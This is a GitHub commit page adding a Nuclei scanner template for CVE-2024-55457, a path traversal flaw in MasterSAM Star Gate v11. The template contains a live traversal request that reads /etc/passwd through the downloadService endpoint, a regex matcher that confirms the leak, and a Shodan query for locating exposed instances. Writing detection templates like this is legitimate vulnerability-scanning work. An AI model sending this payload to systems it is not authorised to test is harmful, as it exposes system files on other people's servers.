Skip to content

Commit

Permalink
Merge pull request #11450 from projectdiscovery/CVE-2024-55457
Browse files Browse the repository at this point in the history
Create CVE-2024-55457.yaml
  • Loading branch information
ritikchaddha authored Jan 7, 2025
2 parents a0b4267 + 2b8315f commit 92c8170
Showing 1 changed file with 29 additions and 0 deletions.
29 changes: 29 additions & 0 deletions http/cves/2024/CVE-2024-55457.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2024-55457

info:
name: MasterSAM Star Gate v11 - Local File Inclusion
author: DhiyaneshDK
severity: high
description: |
MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information.
reference:
- https://github.com/h13nh04ng/CVE-2024-55457-PoC
- https://x.com/cyber_advising/status/1876034270852231257
metadata:
verified: true
max-request: 1
shodan-query: html:"MasterSAM"
tags: cve,cve2024,lfi,mastersam,v11,adama

http:
- method: GET
path:
- "{{BaseURL}}/adama/adama/downloadService?type=1&file=../../../../etc/passwd"

matchers:
- type: dsl
dsl:
- "contains_all(header, 'application/octet-stream', 'filename=')"
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and

0 comments on commit 92c8170

Please sign in to comment.